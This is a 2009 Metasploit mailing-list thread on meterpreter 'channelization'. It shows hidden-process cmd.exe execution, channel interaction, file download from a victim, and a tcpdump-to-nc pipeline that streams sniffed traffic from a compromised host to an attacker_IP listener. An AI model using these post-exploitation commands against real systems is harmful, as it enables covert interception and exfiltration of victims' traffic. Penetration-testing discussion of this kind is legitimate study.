[framework-hackers] Channelized

[anastasiosm at gmail.com (Anastasios Monachos)]

2009/2/9 Bryan Richardson <btricha at gmail.com>

> Thanks Anastasios,
>
> So, am I correct in assuming this is how one is dumped into a Windows shell
> after executing an exploit on a vulnerable Windows machine?

Bryan, if I am following you correctly, yes, using the download command
supplied by meterpreter payload you can get a file from victim's machine to
your machine. Note that in the case of windows you will have to escape the \
with an extra \ when(if) specifying the full path of the file's source and
destination, obviously if you do "download file.txt file.txt" it will try to
get the file from victim's current directory and save it to your current
directory.


> I was hoping that I could 'channelize' a traffic sniffer such that the
> sniffed traffic would be sent back to me in real time for real time
> analysis... it doesn't seem like this is the case.

I agree, real-time traffic in some environments really helps the whole task

Ultimately, what would be cool is to have my real-time traffic analysis
> software listening on a particular port and have some way of sending the
> sniffed traffic from the compromised machine to that particular port on my
> local machine.

I think it worths trying piping your live data through nc as we do with dd,
but I am not sure if it will work in your case, oh you will have to let your
nc traffic pass the firewall.

For example:
On victim you can try something like: tcpdump -e host victim_ip and port 23
| nc attacker_IP attacker_listening_port
On attacker: nc -l -p attacker_listening_port | wireshark -i -
     Taken from wireshark's man
           " .... Pipe names should be either the name of a FIFO (named
pipe) or
           ''-'' to read data from the standard input.  Data read from pipes
           must be in standard libpcap format...."

Last you may also play with the channel read/write options, so to pass nc's
traffic through the channel (?), maybe someone else can reach more light
here

Let us know what worked and what didnt anyway

Tasos


> --
> Bryan
>
> On Mon, Feb 9, 2009 at 2:26 PM, Anastasios Monachos <anastasiosm at gmail.com
> > wrote:
>
> > 2009/2/9 Bryan Richardson <btricha at gmail.com>
> >
> > > Hello All,
> > >
> > > Would someone mind explaining to me what 'channelized' is and how it
> > > works?
> >
> > You can use "channelisation" in cases where you wish to work with multiple
> > communication channels that will be tunnelled through one tcp/ip session.
> >
> > Channels are supported by the meterpreter payload, and to channelise you
> > can do:
> >
> > meterpreter > execute -f cmd.exe -H -c //this will execute the file
> > cmd.exe, it will hide the process window and it will channelise the task
> >
> > Process 1234 created.  //this is output from meterpreter
> >
> > Channel 2 created.//this is output from meterpreter
> >
> > meterpreter > //now use meterpreter as usual to do your other stuff
> >
> > meterpreter > interact 2 //now interact with channelised cmd.exe
> >
> >
> > > I'm wanting to try and use it to send sniffed traffic back to me from a
> > > compromised machine that I upload a traffic sniffer to...
> >
> >
> > For already saved captured data you could use the upload/download commands
> > (again from within meterpreter)
> >
> > > --
> > > Thanks!
> > > Bryan
> > >
> > > _______________________________________________
> > > Framework-Hackers mailing list
> > > Framework-Hackers at spool.metasploit.com
> > > http://spool.metasploit.com/mailman/listinfo/framework-hackers
> >
> > --
> > AM


-- 
AM
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090210/15380c3e/attachment.htm>